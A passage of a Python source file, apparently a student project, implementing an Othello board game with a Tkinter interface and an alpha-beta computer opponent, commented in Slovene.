#Igralec poskuša doseči, da bi imel sam čim več možnih potez, nasprotnik pa čim manj.
#Tako bi imel igralec več možnosti za izbiro dobre poteze, nasprotnika pa bi lahko prisilil v slabo potezo
poteze_crnega = len(self.poteze(CRNI))
poteze_belega = len(self.poteze(BELI))
if self.poteze(CRNI) == ["pass"]:
poteze_crnega = 0
elif self.poteze(BELI) == ["pass"]:
poteze_belega = 0
if self.na_potezi == CRNI:
return (self.vrednost_crnih - self.vrednost_belih) + (poteze_crnega - poteze_belega)
else:
return (self.vrednost_belih - self.vrednost_crnih) + (poteze_belega - poteze_crnega)
def poteze(self, barva):
"""Vrni seznam moznih potez v trenutni poziciji."""
sez_moznosti=[]
for j in range(len(self.polje)):
for i in range(len(self.polje[j])):
if self.polje[i][j] == None:
for (i1,j1) in seznam_sosedov(i, j):
di = i1-i
dj = j1-j
if veljavna(barva, di, dj, self.polje, i, j) and (i,j) not in sez_moznosti:
sez_moznosti.append((i,j))
if sez_moznosti ==[]:
sez_moznosti =["pass"]
return sez_moznosti
def povleci(self, poteza, canvas = None, zetoni = None):
"""Povleče potezo poteza, predpostaviti smemo, da je veljavna."""
# Preden potezo povlečemo, trenutno stanje spravimo
polje = [self.polje[i][:] for i in range(8)] # KOPIJA polja
self.prejsnja_stanja.append([self.na_potezi, self.stejcrne, self.stejbele, self.vrednost_crnih, self.vrednost_belih, polje, self.pass_poteze])
# naredimo potezo
if poteza == "pass":
self.na_potezi = drugi(self.na_potezi) #če igralec nima poteze, ga preskočimo
self.pass_poteze +=1
else:
(i,j) = poteza
self.polje[i][j] = self.na_potezi
self.pass_poteze = 0
# Popravimo stevec črnih/belih in vrednosti črnih/belih
if self.na_potezi == CRNI:
self.stejcrne += 1
self.vrednost_crnih += HEVRISTIKA[i][j]
else:
self.stejbele += 1
self.vrednost_belih += HEVRISTIKA[i][j]
# ukleščeni žetoni spremenijo barvo
self.preobrni(i, j, canvas, zetoni)
# Zdaj je na potezi drugi
self.na_potezi = drugi(self.na_potezi)
#preverimo, ali je na potezi človek, ki nima veljavne poteze in ga po potrebi preskočimo
self.preskok()
def preobrni(self, i, j, canvas = None, zetoni = None):
"""Spremeni barve nasprotnikovih žetonov, ki smo jih ukleščili med svoja žetona"""
barva = self.na_potezi
seznam = seznam_sosedov(i, j)
for (i1, j1) in seznam:
if self.polje[i1][j1] == drugi(barva):
#poiščemo sosednji nasprotnikov žeton in določimo, v kateri smeri se nahaja
#(t.j. določimo di in dj)
di = i1-i
dj = j1-j
if veljavna(barva, di, dj, self.polje, i, j):
#če je poteza, ki smo jo povlekli, veljavna, začnemo spreminjati barvo nasprotnikovim
#žetonom v smeri, ki jo določata di in dj in posodobimo števce za število in vrednost črnih/belih
k = 1
while self.polje[i+k*di][j+k*dj] == drugi(barva):
self.polje[i+k*di][j+k*dj] = barva
if barva == BELI:
if canvas: canvas.itemconfig(zetoni[i+k*di][j+k*dj], fill="white")
self.stejcrne-=1
self.stejbele+=1
self.vrednost_belih += HEVRISTIKA[i+k*di][j+k*dj]
self.vrednost_crnih -= HEVRISTIKA[i+k*di][j+k*dj]
else:
if canvas: canvas.itemconfig(zetoni[i+k*di][j+k*dj], fill="black")
self.stejcrne+=1
self.stejbele-=1
self.vrednost_crnih += HEVRISTIKA[i+k*di][j+k*dj]
self.vrednost_belih -= HEVRISTIKA[i+k*di][j+k*dj]
k += 1
def preklici(self, poteza):
"""Prekliče zandjo potezo."""
self.na_potezi, self.stejcrne, self.stejbele, self.vrednost_crnih, self.vrednost_belih, self.polje, self.pass_poteze = self.prejsnja_stanja.pop()
def preskok(self):
"""Če igralec, ki je človek, ne more storiti ničesar (nobena poteza ni veljavna), ga preskoči"""
if self.slovar[self.na_potezi] == CLOVEK:
if self.poteze(self.na_potezi) == ["pass"]:
self.na_potezi = drugi(self.na_potezi)
class Othello:
"""Razred za glavno aplikacijo. (vsebuje vse v zvezi z GUI)"""
def __init__(self, master):
master.title('Othello')
#-------------------------------------------------meni----------------------------------------------------------#
menu = Menu(master)
master.config(menu=menu)
meni1 = Menu(menu)
menu.add_cascade(label="Igra", menu=meni1)
meni1.add_command(label="Črni=Človek, Beli=Človek", command=lambda: self.zacni_igro(CLOVEK, CLOVEK, None))
meni1.add_command(label="Črni=Človek, Beli=Računalnik - lahka", command=lambda: self.zacni_igro(CLOVEK, RACUNALNIK, 2))
meni1.add_command(label="Črni=Človek, Beli=Računalnik - srednja", command=lambda: self.zacni_igro(CLOVEK, RACUNALNIK, 3))
meni1.add_command(label="Črni=Človek, Beli=Računalnik - težja", command=lambda: self.zacni_igro(CLOVEK, RACUNALNIK, 4))
meni1.add_command(label="Črni=Računalnik, Beli=Človek - lahka", command=lambda: self.zacni_igro(RACUNALNIK, CLOVEK, 2))
meni1.add_command(label="Črni=Računalnik, Beli=Človek - srednja", command=lambda: self.zacni_igro(RACUNALNIK, CLOVEK, 3))
meni1.add_command(label="Črni=Računalnik, Beli=Človek - težja", command=lambda: self.zacni_igro(RACUNALNIK, CLOVEK, 4))
meni1.add_command(label="Črni=Računalnik, Beli=Računalnik", command=lambda: self.zacni_igro(RACUNALNIK, RACUNALNIK, 3))
meni2 = Menu(menu)
menu.add_cascade(label="Navodila", menu=meni2)
meni2.add_command(label="Pravila igre", command=self.narisi_toplevel)
meni3 = Menu(menu)
menu.add_cascade(label="Izhod", menu=meni3)
meni3.add_command(label="Izhod iz igre", command=self.zapri)
#-----------------------------------------------------------------------------------------------------------------#
self.igra = None # Igre ne igramo trenutno
#napis, ki pove, kdo je na vrsti
self.napis = StringVar(master, value="Začnimo.")
Label(master, textvariable=self.napis,font=("Tahoma", 14)).grid(row=0, column=0,sticky=W)
#napis, ki pove, koliko žetonov ima beli/črni
self.napiscrni = StringVar(master, value="")
self.napisbeli = StringVar(master, value="")
Label(master, textvariable=self.napiscrni,font=("Tahoma", 14)).grid(row=3, column=0,sticky=W)
Label(master, textvariable=self.napisbeli,font=("Tahoma", 14)).grid(row=3, column=1,sticky=E)
self.canvas = Canvas(master, width=400, height=400, background="#97CAB1")
self.canvas.grid(row=2, column=0, columnspan=2)
self.canvas.bind('<Button-1>', self.klik)
#seznam, ki vsebuje krogce(žetone) od tkinter
self.zetoni = [[None for i in range(8)] for j in range(8)]
#seznam, ki vsebuje pike, ki označujejo možne poteze
self.pike = [[None for i in range(8)] for j in range(8)]
self.globina = None
self.mislec = None
self.mislec_poteza = None
self.mislec_stop = False
self.zacni_igro(CLOVEK, CLOVEK, None)
def narisi_toplevel(self):
"""Ustvari novo okno, ki se odpre, ko v meniju izberemo možnost 'Navodila'"""
toplevel = Toplevel(master, width=100, height=100, takefocus = True)
toplevel.title("Pravila igre")
toplevel.resizable(width=False, height=False) #preprečimo spreminjanje velikosti okna
#nize iz seznama "navodila" združimo v en niz
navodilo = ""
for element in navodila:
navodilo+=element
text = Text(toplevel) #tekst znotraj okna "toplevel"
scrollbar = Scrollbar(toplevel)
scrollbar.config(command=text.yview)
text.config(yscrollcommand=scrollbar.set)
scrollbar.pack(side="right", fill="y", expand=False)
text.pack(side="left", fill="both", expand=True)
text.insert(INSERT,navodilo)
text.config(wrap=WORD) #poskrbimo, da ne prelomi besed, ki morajo v novo vrstico
text.config(state=DISABLED) #preprečimo spreminjanje teksta
def zapri(self):
"""Zapre igro"""
if self.mislec != None:
self.mislec_stop = True
self.mislec.join()
self.canvas.master.destroy()
def zacni_igro(self, crni, beli, globina):
# Ustvari novo igro
self.igra = Igra()
self.globina = globina
self.igra.crni = crni #kdo je črni
self.igra.beli = beli #kdo je beli
#slovar, ki črnemu/belemu priredi njegov status (t.j. ali je človek ali računalnik)
self.igra.slovar = {CRNI:self.igra.crni, BELI:self.igra.beli}
#Če racunalnik še vedno misli, mu povemo, naj neha in počakamo, da neha
if self.mislec != None:
self.mislec_stop = True
self.mislec.join()
#seznam, ki vsebuje žetone (krogce iz tkinter-ja)
self.zetoni = [[None for i in range(8)] for j in range(8)]
#seznam, ki vsebuje pike (iz tkinter-ja), ki označujejo možne poteze
self.pike = [[None for i in range(8)] for j in range(8)]
#nastavi, da začne črni, in posodobi napise
if self.igra.crni == CLOVEK:
self.napis.set("Na potezi je Črni.")
else:
self.napis.set("Črni razmišlja. Ne bodite nestrpni!")
#nastavi napise za število črnih/belih žetonov
self.napiscrni.set("Črni: "+str(self.igra.stejcrne))
self.napisbeli.set("Beli: "+str(self.igra.stejbele))
#nariše črte na kanvas
self.canvas.delete(ALL)
for i in range(8):
self.canvas.create_line(i*50,0,i*50,400, fill="black", width=2)
self.canvas.create_line(0,i*50,400,i*50, fill="black", width=2)
#nariše začetne žetone
self.canvas.create_oval(150+5, 150+5, 150+45, 150+45, fill="black")
self.canvas.create_oval(200+5, 200+5, 200+45, 200+45, fill="black")
self.canvas.create_oval(200+5, 150+5, 200+45, 150+45, fill="white")
self.canvas.create_oval(150+5, 200+5, 150+45, 200+45, fill="white")
#začetne žetone doda v self.zetoni
self.zetoni[3][3]=self.canvas.create_oval(150+5, 150+5, 150+45, 150+45, fill="black")
self.zetoni[4][4]=self.canvas.create_oval(200+5, 200+5, 200+45, 200+45, fill="black")
self.zetoni[4][3]=self.canvas.create_oval(200+5, 150+5, 200+45, 150+45, fill="white")
self.zetoni[3][4]=self.canvas.create_oval(150+5, 200+5, 150+45, 200+45, fill="white")
self.pomoc() #nariše pike, ki označujejo možne poteze
if self.igra.crni == RACUNALNIK:
self.racunalnik_odigraj_potezo()
def odigraj(self, poteza):
"""Če je polje prazno in poteza veljavna, se poteza odigra."""
if poteza == "pass":
#če igralec nima možne poteze, se zgolj spremenijo napisi, ki povejo, kdo je na potezi
self.konec_pomoci() #s canvasa pobriše pike, ki označujejo možne poteze
self.igra.povleci(poteza, canvas=self.canvas, zetoni=self.zetoni)
if self.igra.slovar[self.igra.na_potezi] == CLOVEK:
self.napis.set("Na potezi je " + self.igra.na_potezi)
else:
self.napis.set(self.igra.na_potezi + " razmišlja. Ne bodite nestrpni!")
self.pomoc()
else:
#preveri, ali je poteza veljavna
i,j=poteza[0],poteza[1]
je_veljavna = False
for (dx, dy) in [(-1,0), (1,0), (0,-1), (0,1), (1,1), (1,-1), (-1,1), (-1,-1)]:
je_veljavna = veljavna(self.igra.na_potezi, dx, dy, self.igra.polje, i, j)
if je_veljavna: break
#če je poteza veljavna, jo nariše in nato posodobi napise
if self.igra.polje[i][j] is None and je_veljavna:
self.konec_pomoci() #s canvasa pobriše pike, ki označujejo možne poteze
if self.igra.na_potezi == CRNI:
self.narisiCrnega(i,j)
else:
self.narisiBelega(i,j)
self.igra.povleci((i,j), canvas=self.canvas, zetoni=self.zetoni)
if self.igra.slovar[self.igra.na_potezi] == CLOVEK:
self.napis.set("Na potezi je " + self.igra.na_potezi)
else:
self.napis.set(self.igra.na_potezi + " razmišlja. Ne bodite nestrpni!")
self.napiscrni.set("Črni: "+str(self.igra.stejcrne))
self.napisbeli.set("Beli: "+str(self.igra.stejbele))
self.pomoc()
#preveri, ali je igre konec
r = self.igra.konec()
if r == "Neodločeno":
self.igra.na_potezi = None
self.napis.set("Neodločeno")
elif r is not None:
self.napis.set('Zmagal je ' + r)
else:
# Preverimo, ali mora računalnik odigrati potezo
if self.igra.slovar[self.igra.na_potezi] == RACUNALNIK:
# Namesto, da bi neposredno poklicali self.racunalnik_odigraj_potezo,
# to naredimo z zamikom, da se lahko prejšnja poteza sploh nariše.
self.canvas.after(100, self.racunalnik_odigraj_potezo)
def racunalnik_odigraj_potezo(self):
'''Računalnik odigra naslednjo potezo.'''
# Naredimo vzporedno vlakno
self.mislec_poteza = None
self.mislec_stop = False
self.mislec = threading.Thread(target=self.razmisljaj)
# Poženemo vzporedno vlakno
self.mislec.start()
# Čez 0.1 sekunde preverimo, ali je self.mislec končal
self.canvas.after(100, self.mislec_preveri_konec)
def razmisljaj(self):
"""Za računalnikovo potezo nastavi potezo, ki jo je predlagala 'alphabeta'"""
self.mislec_poteza = Alphabeta(self.igra, True, globina = self.globina).igraj()
self.mislec = None # Pobrišemo objekt, ki predstavlja vlakno
def mislec_preveri_konec(self):
"""Preveri, ali je 'alphabeta' že našla potezo, in jo odigra"""
if self.mislec_poteza == None:
# self.mislec ni končal, preverimo še enkrat čez 0.1 sekunde
self.canvas.after(100, self.mislec_preveri_konec)
else:
# self.mislec je končal, povlečemo potezo
poteza = self.mislec_poteza
self.odigraj(poteza)
def klik(self, event):
"""Ko klikneš, se odigra poteza"""
if self.igra.slovar[self.igra.na_potezi] == CLOVEK:
i = int(event.x / 50)
j = int(event.y / 50)
self.odigraj((i, j))
def narisiCrnega(self, i, j):
"""Nariše črn žeton"""
x = i * 50
y = j * 50
self.canvas.create_oval(x+5, y+5, x+45, y+45, fill="black")
self.zetoni[i][j] = self.canvas.create_oval(x+5, y+5, x+45, y+45, fill="black")
def narisiBelega(self, i, j):
"""Nariše bel žeton"""
x = i * 50
y = j * 50
self.canvas.create_oval(x+5, y+5, x+45, y+45, fill="white")
self.zetoni[i][j] = self.canvas.create_oval(x+5, y+5, x+45, y+45, fill="white")
def pomoc(self):
"""Nariše pike, ki označujejo možne poteze, ki jih ima igralec na potezi"""
if self.igra.slovar[self.igra.na_potezi] == CLOVEK:
for poteza in self.igra.poteze(self.igra.na_potezi):
if poteza == "pass":
pass
else:
i,j=poteza[0],poteza[1]
pika = self.canvas.create_oval(i*50+20, j*50+20, i*50+25, j*50+25, fill="green")
self.pike[i][j] = pika
def konec_pomoci(self):
"""Zbriše pike, ki označujejo možne poteze igralca na potezi"""
for podseznam in self.pike:
for element in podseznam:
if element != None :
self.canvas.delete(element)
self.pike = [[None for i in range(8)] for j in range(8)]
master = Tk()
aplikacija = Othello(master)
master.resizable(width=FALSE, height=FALSE) #preprečimo, da bi uporabnik spreminjal velikost okna
master.mainloop()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.